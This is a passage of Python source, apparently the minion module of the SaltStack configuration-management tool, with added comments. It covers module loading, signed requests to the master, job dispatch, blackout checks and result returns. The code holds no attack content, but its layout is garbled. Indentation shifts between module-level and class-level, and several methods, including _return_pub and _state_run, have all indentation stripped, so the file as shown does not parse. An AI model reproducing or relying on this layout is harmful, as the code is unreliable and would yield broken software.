            # ping it so we can fail back when it comes online again.
            self.schedule.add_job({
                master_event(type='failback'):
                {
                    'function': 'status.ping_master',
                    'seconds': self.opts['master_failback_interval'],
                    'jid_include': True,
                    'maxrunning': 1,
                    'return_job': False,
                    'kwargs': {'master': self.opts['master_list'][0]}
                }
            }, persist=True)
        else:
            self.schedule.delete_job(master_event(type='failback'), persist=True)
    else:
        # Alive/failback tracking not applicable: remove any stale jobs
        self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
        self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
    '''
    Returns a copy of the opts with key bits stripped out

    :return: shallow copy of self.opts without the 'logger' key
        (values are still shared with self.opts).
    '''
    # Dict comprehension replaces the manual loop-with-continue; the only
    # key excluded is 'logger', which modules must not receive.
    return {key: val
            for key, val in six.iteritems(self.opts)
            if key != 'logger'}
def _load_modules(self, force_refresh=False, notify=False, grains=None, opts=None):
    '''
    Return the functions and the returners loaded up from the loader
    module

    :param force_refresh: force a grains refresh when grains are rebuilt.
    :param notify: forwarded to the loader (fires module-refresh events).
    :param grains: when not None, skip regenerating grains.
    :param opts: alternate opts dict; when supplied it also replaces
        self.opts after loading.
    :return: tuple of (functions, returners, errors, executors)
    '''
    opt_in = True  # whether the caller-supplied opts should become self.opts
    if not opts:
        opts = self.opts
        opt_in = False
    # if this is a *nix system AND modules_max_memory is set, lets enforce
    # a memory limit on module imports
    # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
    modules_max_memory = False
    if opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
        log.debug(
            'modules_max_memory set, enforcing a maximum of %s',
            opts['modules_max_memory']
        )
        modules_max_memory = True
        old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
        rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
        # Address-space limit = current usage plus the configured headroom
        mem_limit = rss + vms + opts['modules_max_memory']
        resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
    elif opts.get('modules_max_memory', -1) > 0:
        if not HAS_PSUTIL:
            log.error('Unable to enforce modules_max_memory because psutil is missing')
        if not HAS_RESOURCE:
            log.error('Unable to enforce modules_max_memory because resource is missing')
    # This might be a proxy minion
    if hasattr(self, 'proxy'):
        proxy = self.proxy
    else:
        proxy = None
    if grains is None:
        opts['grains'] = salt.loader.grains(opts, force_refresh, proxy=proxy)
    self.utils = salt.loader.utils(opts, proxy=proxy)

    if opts.get('multimaster', False):
        # Deep-copy opts so per-master loaders cannot mutate shared state
        s_opts = copy.deepcopy(opts)
        functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
                                            loaded_base_name=self.loaded_base_name, notify=notify)
    else:
        functions = salt.loader.minion_mods(opts, utils=self.utils, notify=notify, proxy=proxy)
    returners = salt.loader.returners(opts, functions, proxy=proxy)
    errors = {}
    if '_errors' in functions:
        # Loader stashes per-module load errors under '_errors'; pull them
        # out so they don't pollute the function dict.
        errors = functions['_errors']
        functions.pop('_errors')

    # we're done, reset the limits!
    if modules_max_memory is True:
        resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)

    executors = salt.loader.executors(opts, functions, proxy=proxy)

    if opt_in:
        self.opts = opts

    return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
    '''
    Synchronously send ``load`` to the master over a request channel and
    return the reply. The channel is always closed, even on error.
    '''
    if self.opts['minion_sign_messages']:
        # Optionally attach a signature so the master can verify origin
        log.trace('Signing event to be published onto the bus.')
        privkey = os.path.join(self.opts['pki_dir'], 'minion.pem')
        serialized = salt.serializers.msgpack.serialize(load)
        load['sig'] = salt.crypt.sign_message(privkey, serialized)
    req_channel = salt.transport.client.ReqChannel.factory(self.opts)
    try:
        return req_channel.send(load, timeout=timeout)
    finally:
        req_channel.close()
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
    '''
    Coroutine counterpart of _send_req_sync: send ``load`` to the master
    over an async request channel and resolve with the reply. The channel
    is always closed, even on error.
    '''
    if self.opts['minion_sign_messages']:
        # Optionally attach a signature so the master can verify origin
        log.trace('Signing event to be published onto the bus.')
        privkey = os.path.join(self.opts['pki_dir'], 'minion.pem')
        serialized = salt.serializers.msgpack.serialize(load)
        load['sig'] = salt.crypt.sign_message(privkey, serialized)
    async_channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
    try:
        reply = yield async_channel.send(load, timeout=timeout)
        raise tornado.gen.Return(reply)
    finally:
        async_channel.close()
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
    '''
    Fire an event on the master, or drop message if unable to send.

    :param data: event payload, used together with ``tag``.
    :param events: pre-built list of events; takes precedence over data/tag.
    :param pretag: prefix tag forwarded to the master.
    :param timeout: send timeout in seconds.
    :param sync: when True send synchronously and report success; otherwise
        fire asynchronously on the IO loop.
    :param timeout_handler: async-mode handler invoked on send errors.
    :return: True on (attempted) send, False on sync-mode failure, None
        when there was nothing to send.
    '''
    load = {'id': self.opts['id'],
            'cmd': '_minion_event',
            'pretag': pretag,
            'tok': self.tok}
    if events:
        load['events'] = events
    elif data and tag:
        load['data'] = data
        load['tag'] = tag
    elif not data and tag:
        load['data'] = {}
        load['tag'] = tag
    else:
        # Neither events nor a tag: nothing meaningful to send
        return

    if sync:
        try:
            self._send_req_sync(load, timeout)
        except salt.exceptions.SaltReqTimeoutError:
            log.info('fire_master failed: master could not be contacted. Request timed out.')
            # very likely one of the masters is dead, status.master will flush it
            self.functions['status.master'](self.opts['master'])
            return False
        except Exception:
            log.info('fire_master failed: %s', traceback.format_exc())
            return False
    else:
        if timeout_handler is None:
            def handle_timeout(*_):
                log.info('fire_master failed: master could not be contacted. Request timed out.')
                # very likely one of the masters is dead, status.master will flush it
                self.functions['status.master'](self.opts['master'])
                # Returning True marks the exception as handled
                return True
            timeout_handler = handle_timeout

        # Exceptions escaping the async send are routed to timeout_handler
        with tornado.stack_context.ExceptionStackContext(timeout_handler):
            self._send_req_async(load, timeout, callback=lambda f: None)  # pylint: disable=unexpected-keyword-arg
    return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
    '''
    Override this method if you wish to handle the decoded data
    differently.

    Dispatches a decoded job payload: deduplicates by JID, optionally
    throttles on the running-process count, then executes the job in a
    subprocess (or thread when multiprocessing is disabled).
    '''
    # Ensure payload is unicode. Disregard failure to decode binary blobs.
    if six.PY2:
        data = salt.utils.data.decode(data, keep=True)
    if 'user' in data:
        log.info(
            'User %s Executing command %s with jid %s',
            data['user'], data['fun'], data['jid']
        )
    else:
        log.info(
            'Executing command %s with jid %s',
            data['fun'], data['jid']
        )
    log.debug('Command details %s', data)

    # Don't duplicate jobs
    log.trace('Started JIDs: %s', self.jid_queue)
    if self.jid_queue is not None:
        if data['jid'] in self.jid_queue:
            # Already seen (e.g. same job from multiple masters): drop it
            return
        else:
            self.jid_queue.append(data['jid'])
            if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
                # Bounded queue: evict the oldest JID
                self.jid_queue.pop(0)

    if isinstance(data['fun'], six.string_types):
        if data['fun'] == 'sys.reload_modules':
            # Reload in-process so the schedule sees the fresh modules too
            self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
            self.schedule.functions = self.functions
            self.schedule.returners = self.returners

    process_count_max = self.opts.get('process_count_max')
    process_count_max_sleep_secs = self.opts.get('process_count_max_sleep_secs')
    if process_count_max > 0:
        # Throttle: wait until the number of running jobs drops below the cap
        process_count = len(salt.utils.minion.running(self.opts))
        while process_count >= process_count_max:
            log.warning('Maximum number of processes (%s) reached while '
                        'executing jid %s, waiting %s seconds...',
                        process_count_max,
                        data['jid'],
                        process_count_max_sleep_secs)
            yield tornado.gen.sleep(process_count_max_sleep_secs)
            process_count = len(salt.utils.minion.running(self.opts))

    # We stash an instance references to allow for the socket
    # communication in Windows. You can't pickle functions, and thus
    # python needs to be able to reconstruct the reference on the other
    # side.
    instance = self
    multiprocessing_enabled = self.opts.get('multiprocessing', True)
    if multiprocessing_enabled:
        if sys.platform.startswith('win'):
            # let python reconstruct the minion on the other side if we're
            # running on windows
            instance = None
        with default_signals(signal.SIGINT, signal.SIGTERM):
            process = SignalHandlingMultiprocessingProcess(
                target=self._target, args=(instance, self.opts, data, self.connected)
            )
    else:
        # Thread-per-job when multiprocessing is disabled
        process = threading.Thread(
            target=self._target,
            args=(instance, self.opts, data, self.connected),
            name=data['jid']
        )

    if multiprocessing_enabled:
        with default_signals(signal.SIGINT, signal.SIGTERM):
            # Reset current signals before starting the process in
            # order not to inherit the current signal handlers
            process.start()
    else:
        process.start()

    # TODO: remove the windows specific check?
    if multiprocessing_enabled and not salt.utils.platform.is_windows():
        # we only want to join() immediately if we are daemonizing a process
        process.join()
    elif salt.utils.platform.is_windows():
        self.win_proc.append(process)
def ctx(self):
    '''
    Return a single context manager for the minion's data

    Combines clones of the functions/returners/executors context dicts
    into one manager so all three are entered and exited together.
    '''
    managers = (
        self.functions.context_dict.clone(),
        self.returners.context_dict.clone(),
        self.executors.context_dict.clone(),
    )
    if six.PY2:
        # contextlib.nested only exists (and is only needed) on PY2
        return contextlib.nested(*managers)
    stack = contextlib.ExitStack()
    for manager in managers:
        stack.enter_context(manager)
    return stack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
    '''
    Job entry point run in the spawned thread/process: (re)build a minion
    instance when one was not passed, then dispatch the job to the single-
    or multi-function runner.
    '''
    if not minion_instance:
        # On Windows the instance is not pickled across the process
        # boundary, so it is reconstructed here from opts.
        minion_instance = cls(opts)
        minion_instance.connected = connected
        if not hasattr(minion_instance, 'functions'):
            functions, returners, function_errors, executors = (
                minion_instance._load_modules(grains=opts['grains'])
            )
            minion_instance.functions = functions
            minion_instance.returners = returners
            minion_instance.function_errors = function_errors
            minion_instance.executors = executors
        if not hasattr(minion_instance, 'serial'):
            minion_instance.serial = salt.payload.Serial(opts)
        if not hasattr(minion_instance, 'proc_dir'):
            uid = salt.utils.user.get_uid(user=opts.get('user', None))
            minion_instance.proc_dir = (
                get_proc_dir(opts['cachedir'], uid=uid)
            )

    def run_func(minion_instance, opts, data):
        # A tuple/list of function names means a multi-function job
        if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
            return Minion._thread_multi_return(minion_instance, opts, data)
        else:
            return Minion._thread_return(minion_instance, opts, data)

    # Make the job data/opts and the minion's context dicts available for
    # the duration of the run via tornado stack contexts.
    with tornado.stack_context.StackContext(functools.partial(RequestContext,
                                                              {'data': data, 'opts': opts})):
        with tornado.stack_context.StackContext(minion_instance.ctx):
            run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
    '''
    This method should be used as a threading target, start the actual
    minion side execution.

    Runs the single-function job described by ``data`` (keys: jid, fun,
    arg, ret, ...): records it in the proc dir, executes it through the
    configured executor chain, then publishes the result to the master
    and/or any configured returners.
    '''
    fn_ = os.path.join(minion_instance.proc_dir, data['jid'])

    if opts['multiprocessing'] and not salt.utils.platform.is_windows():
        # Shutdown the multiprocessing before daemonizing
        salt.log.setup.shutdown_multiprocessing_logging()

        salt.utils.process.daemonize_if(opts)

        # Reconfigure multiprocessing logging after daemonizing
        salt.log.setup.setup_multiprocessing_logging()

    salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))

    sdata = {'pid': os.getpid()}
    sdata.update(data)
    log.info('Starting a new job %s with PID %s', data['jid'], sdata['pid'])
    # Record the running job in the proc dir so it can be enumerated later
    with salt.utils.files.fopen(fn_, 'w+b') as fp_:
        fp_.write(minion_instance.serial.dumps(sdata))
    ret = {'success': False}
    function_name = data['fun']
    # Executor resolution order: per-job, per-minion, then config default
    executors = data.get('module_executors') or \
                getattr(minion_instance, 'module_executors', []) or \
                opts.get('module_executors', ['direct_call'])
    # BUGFIX: the guard previously tested the *unformatted* literal
    # '{0}.allow_missing_func' for membership, which never matched, so
    # allow_missing_funcs was always False.  The executor name must be
    # formatted into the key before the membership test.
    allow_missing_funcs = any(
        minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
        for executor in executors
        if '{0}.allow_missing_func'.format(executor) in minion_instance.executors
    )
    if function_name in minion_instance.functions or allow_missing_funcs is True:
        try:
            minion_blackout_violation = False
            if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
                whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
                # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
                if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
                    minion_blackout_violation = True
            # use minion_blackout_whitelist from grains if it exists
            if minion_instance.opts['grains'].get('minion_blackout', False):
                whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
                if function_name != 'saltutil.refresh_pillar' and function_name not in whitelist:
                    minion_blackout_violation = True
            if minion_blackout_violation:
                raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
                                          'to False in pillar or grains to resume operations. Only '
                                          'saltutil.refresh_pillar allowed in blackout mode.')

            if function_name in minion_instance.functions:
                func = minion_instance.functions[function_name]
                args, kwargs = load_args_and_kwargs(
                    func,
                    data['arg'],
                    data)
            else:
                # only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
                func = function_name
                args, kwargs = data['arg'], data
            minion_instance.functions.pack['__context__']['retcode'] = 0

            if isinstance(executors, six.string_types):
                executors = [executors]
            elif not isinstance(executors, list) or not executors:
                raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
                                          format(executors))
            if opts.get('sudo_user', '') and executors[-1] != 'sudo':
                executors[-1] = 'sudo'  # replace the last one with sudo
            log.trace('Executors list %s', executors)  # pylint: disable=no-member

            # Run the executor chain until one produces a non-None result
            for name in executors:
                fname = '{0}.execute'.format(name)
                if fname not in minion_instance.executors:
                    raise SaltInvocationError("Executor '{0}' is not available".format(name))
                return_data = minion_instance.executors[fname](opts, data, func, args, kwargs)
                if return_data is not None:
                    break

            if isinstance(return_data, types.GeneratorType):
                # Stream generator output: accumulate into a dict (or list
                # for non-dict items) and fire a progress event per item.
                ind = 0
                iret = {}
                for single in return_data:
                    if isinstance(single, dict) and isinstance(iret, dict):
                        iret.update(single)
                    else:
                        if not iret:
                            iret = []
                        iret.append(single)
                    tag = tagify([data['jid'], 'prog', opts['id'], six.text_type(ind)], 'job')
                    event_data = {'return': single}
                    minion_instance._fire_master(event_data, tag)
                    ind += 1
                ret['return'] = iret
            else:
                ret['return'] = return_data

            retcode = minion_instance.functions.pack['__context__'].get(
                'retcode',
                salt.defaults.exitcodes.EX_OK
            )
            if retcode == salt.defaults.exitcodes.EX_OK:
                # No nonzero retcode in __context__ dunder. Check if return
                # is a dictionary with a "result" or "success" key.
                try:
                    func_result = all(return_data.get(x, True)
                                      for x in ('result', 'success'))
                except Exception:
                    # return data is not a dict
                    func_result = True
                if not func_result:
                    retcode = salt.defaults.exitcodes.EX_GENERIC

            ret['retcode'] = retcode
            ret['success'] = retcode == salt.defaults.exitcodes.EX_OK
        except CommandNotFoundError as exc:
            msg = 'Command required for \'{0}\' not found'.format(
                function_name
            )
            log.debug(msg, exc_info=True)
            ret['return'] = '{0}: {1}'.format(msg, exc)
            ret['out'] = 'nested'
            ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
        except CommandExecutionError as exc:
            log.error(
                'A command in \'%s\' had a problem: %s',
                function_name, exc,
                exc_info_on_loglevel=logging.DEBUG
            )
            ret['return'] = 'ERROR: {0}'.format(exc)
            ret['out'] = 'nested'
            ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
        except SaltInvocationError as exc:
            log.error(
                'Problem executing \'%s\': %s',
                function_name, exc,
                exc_info_on_loglevel=logging.DEBUG
            )
            ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
                function_name, exc
            )
            ret['out'] = 'nested'
            ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
        except TypeError as exc:
            msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(
                function_name, exc, func.__doc__ or ''
            )
            log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
            ret['return'] = msg
            ret['out'] = 'nested'
            ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
        except Exception:
            msg = 'The minion function caused an exception'
            # NOTE(review): exc_info_on_loglevel takes a log level in the
            # handlers above; the True here is preserved as-is -- confirm.
            log.warning(msg, exc_info_on_loglevel=True)
            salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
            ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
            ret['out'] = 'nested'
            ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
    else:
        # Function is missing and no executor allows missing functions:
        # return the closest available docs / a missing-function message.
        docs = minion_instance.functions['sys.doc']('{0}*'.format(function_name))
        if docs:
            docs[function_name] = minion_instance.functions.missing_fun_string(function_name)
            ret['return'] = docs
        else:
            ret['return'] = minion_instance.functions.missing_fun_string(function_name)
            mod_name = function_name.split('.')[0]
            if mod_name in minion_instance.function_errors:
                ret['return'] += ' Possible reasons: \'{0}\''.format(
                    minion_instance.function_errors[mod_name]
                )
        ret['success'] = False
        ret['retcode'] = salt.defaults.exitcodes.EX_GENERIC
        ret['out'] = 'nested'

    ret['jid'] = data['jid']
    ret['fun'] = data['fun']
    ret['fun_args'] = data['arg']
    if 'master_id' in data:
        ret['master_id'] = data['master_id']
    if 'metadata' in data:
        if isinstance(data['metadata'], dict):
            ret['metadata'] = data['metadata']
        else:
            log.warning('The metadata parameter must be a dictionary. Ignoring.')
    if minion_instance.connected:
        minion_instance._return_pub(
            ret,
            timeout=minion_instance._return_retry_timer()
        )

    # Add default returners from minion config
    # Should have been converted to comma-delimited string already
    if isinstance(opts.get('return'), six.string_types):
        if data['ret']:
            data['ret'] = ','.join((data['ret'], opts['return']))
        else:
            data['ret'] = opts['return']

    log.debug('minion return: %s', ret)
    # TODO: make a list? Seems odd to split it this late :/
    if data['ret'] and isinstance(data['ret'], six.string_types):
        if 'ret_config' in data:
            ret['ret_config'] = data['ret_config']
        if 'ret_kwargs' in data:
            ret['ret_kwargs'] = data['ret_kwargs']
        ret['id'] = opts['id']
        for returner in set(data['ret'].split(',')):
            try:
                returner_str = '{0}.returner'.format(returner)
                if returner_str in minion_instance.returners:
                    minion_instance.returners[returner_str](ret)
                else:
                    returner_err = minion_instance.returners.missing_fun_string(returner_str)
                    log.error(
                        'Returner %s could not be loaded: %s',
                        returner_str, returner_err
                    )
            except Exception as exc:
                # A broken returner must not kill result delivery to others
                log.exception(
                    'The return failed for job %s: %s', data['jid'], exc
                )
    @classmethod
    def _thread_multi_return(cls, minion_instance, opts, data):
        '''
        This method should be used as a threading target, start the actual
        minion side execution.

        Runs every function listed in ``data['fun']`` (a multi-function
        publication), collects per-function return/retcode/success, then
        publishes the combined result to the master and any configured
        returners.
        '''
        # Proc file path for this job; written below so running jobs are visible
        fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
        if opts['multiprocessing'] and not salt.utils.platform.is_windows():
            # Shutdown the multiprocessing before daemonizing
            salt.log.setup.shutdown_multiprocessing_logging()
            salt.utils.process.daemonize_if(opts)
            # Reconfigure multiprocessing logging after daemonizing
            salt.log.setup.setup_multiprocessing_logging()
        salt.utils.process.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
        sdata = {'pid': os.getpid()}
        sdata.update(data)
        log.info('Starting a new job with PID %s', sdata['pid'])
        with salt.utils.files.fopen(fn_, 'w+b') as fp_:
            fp_.write(minion_instance.serial.dumps(sdata))
        # When multifunc_ordered is set, results are positional lists keyed by
        # index; otherwise they are dicts keyed by function name.
        multifunc_ordered = opts.get('multifunc_ordered', False)
        num_funcs = len(data['fun'])
        if multifunc_ordered:
            ret = {
                'return': [None] * num_funcs,
                'retcode': [None] * num_funcs,
                'success': [False] * num_funcs
            }
        else:
            ret = {
                'return': {},
                'retcode': {},
                'success': {}
            }
        for ind in range(0, num_funcs):
            if not multifunc_ordered:
                ret['success'][data['fun'][ind]] = False
            try:
                # Blackout mode: pillar takes precedence over grains; only
                # saltutil.refresh_pillar and whitelisted functions may run.
                minion_blackout_violation = False
                if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
                    whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
                    # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
                    if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
                        minion_blackout_violation = True
                elif minion_instance.opts['grains'].get('minion_blackout', False):
                    whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
                    if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
                        minion_blackout_violation = True
                if minion_blackout_violation:
                    raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
                                              'to False in pillar or grains to resume operations. Only '
                                              'saltutil.refresh_pillar allowed in blackout mode.')
                func = minion_instance.functions[data['fun'][ind]]
                args, kwargs = load_args_and_kwargs(
                    func,
                    data['arg'][ind],
                    data)
                # Reset the context retcode so this function's value is isolated
                minion_instance.functions.pack['__context__']['retcode'] = 0
                key = ind if multifunc_ordered else data['fun'][ind]
                ret['return'][key] = func(*args, **kwargs)
                retcode = minion_instance.functions.pack['__context__'].get(
                    'retcode',
                    0
                )
                if retcode == 0:
                    # No nonzero retcode in __context__ dunder. Check if return
                    # is a dictionary with a "result" or "success" key.
                    try:
                        func_result = all(ret['return'][key].get(x, True)
                                          for x in ('result', 'success'))
                    except Exception:
                        # return data is not a dict
                        func_result = True
                    if not func_result:
                        retcode = 1
                ret['retcode'][key] = retcode
                ret['success'][key] = retcode == 0
            except Exception as exc:
                # Report the traceback as the function's return value
                trb = traceback.format_exc()
                log.warning('The minion function caused an exception: %s', exc)
                if multifunc_ordered:
                    ret['return'][ind] = trb
                else:
                    ret['return'][data['fun'][ind]] = trb
        ret['jid'] = data['jid']
        ret['fun'] = data['fun']
        ret['fun_args'] = data['arg']
        if 'metadata' in data:
            ret['metadata'] = data['metadata']
        if minion_instance.connected:
            minion_instance._return_pub(
                ret,
                timeout=minion_instance._return_retry_timer()
            )
        # Also deliver the result to any returners requested in the publication
        if data['ret']:
            if 'ret_config' in data:
                ret['ret_config'] = data['ret_config']
            if 'ret_kwargs' in data:
                ret['ret_kwargs'] = data['ret_kwargs']
            for returner in set(data['ret'].split(',')):
                ret['id'] = opts['id']
                try:
                    minion_instance.returners['{0}.returner'.format(
                        returner
                    )](ret)
                except Exception as exc:
                    log.error(
                        'The return failed for job %s: %s',
                        data['jid'], exc
                    )
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
    def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
        '''
        Return the data from the executed command to the master server

        Accepts a single return dict or a list of them; returns that share
        a jid are merged into one load, and all loads are delivered in a
        single request.

        :param rets: one return dict or a list of return dicts
        :param str ret_cmd: master-side command the load is addressed to
        :param int timeout: request timeout in seconds
        :param bool sync: send synchronously when True
        '''
        if not isinstance(rets, list):
            rets = [rets]
        # jid -> merged load for that job
        jids = {}
        for ret in rets:
            jid = ret.get('jid', ret.get('__jid__'))
            fun = ret.get('fun', ret.get('__fun__'))
            if self.opts['multiprocessing']:
                # Remove the per-job proc file now that the job has finished
                fn_ = os.path.join(self.proc_dir, jid)
                if os.path.isfile(fn_):
                    try:
                        os.remove(fn_)
                    except (OSError, IOError):
                        # The file is gone already
                        pass
            log.info('Returning information for job: %s', jid)
            load = jids.setdefault(jid, {})
            if ret_cmd == '_syndic_return':
                # Only populate the static job fields once per jid
                if not load:
                    load.update({'id': self.opts['id'],
                                 'jid': jid,
                                 'fun': fun,
                                 'arg': ret.get('arg'),
                                 'tgt': ret.get('tgt'),
                                 'tgt_type': ret.get('tgt_type'),
                                 'load': ret.get('__load__'),
                                 'return': {}})
                if '__master_id__' in ret:
                    load['master_id'] = ret['__master_id__']
                for key, value in six.iteritems(ret):
                    # Dunder keys are routing metadata, not job return data
                    if key.startswith('__'):
                        continue
                    load['return'][key] = value
            else:
                load.update({'id': self.opts['id']})
                for key, value in six.iteritems(ret):
                    load[key] = value
                if 'out' in ret:
                    if isinstance(ret['out'], six.string_types):
                        load['out'] = ret['out']
                    else:
                        log.error(
                            'Invalid outputter %s. This is likely a bug.',
                            ret['out']
                        )
                else:
                    # Fall back to the executed function's declared outputter
                    try:
                        oput = self.functions[fun].__outputter__
                    except (KeyError, AttributeError, TypeError):
                        pass
                    else:
                        if isinstance(oput, six.string_types):
                            load['out'] = oput
            if self.opts['cache_jobs']:
                # Local job cache has been enabled
                salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
        # Wrap all merged loads into one request payload
        load = {'cmd': ret_cmd,
                'load': list(six.itervalues(jids))}
        def timeout_handler(*_):
            # NOTE(review): 'jid' is whatever the loop variable last held —
            # with several jids the warning may name only the final one.
            log.warning(
                'The minion failed to return the job information for job %s. '
                'This is often due to the master being shut down or '
                'overloaded. If the master is running, consider increasing '
                'the worker_threads value.', jid
            )
            return True
        if sync:
            try:
                ret_val = self._send_req_sync(load, timeout=timeout)
            except SaltReqTimeoutError:
                timeout_handler()
                return ''
        else:
            with tornado.stack_context.ExceptionStackContext(timeout_handler):
                ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None)  # pylint: disable=unexpected-keyword-arg
        log.trace('ret_val = %s', ret_val)  # pylint: disable=no-member
        return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to False in Sodium release.
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
    def beacons_refresh(self):
        '''
        Rebuild the beacon manager so it picks up the current opts and
        the current function loader.
        '''
        log.debug('Refreshing beacons.')
        self.beacons = salt.beacons.Beacon(self.opts, self.functions)
    def matchers_refresh(self):
        '''
        Reload the target matcher modules from the loader.
        '''
        log.debug('Refreshing matchers.')
        self.matchers = salt.loader.matchers(self.opts)
    # TODO: only allow one future in flight at a time?
    @tornado.gen.coroutine
    def pillar_refresh(self, force_refresh=False, notify=False):
        '''
        Refresh the pillar

        Re-compiles pillar from the master (when connected) and then
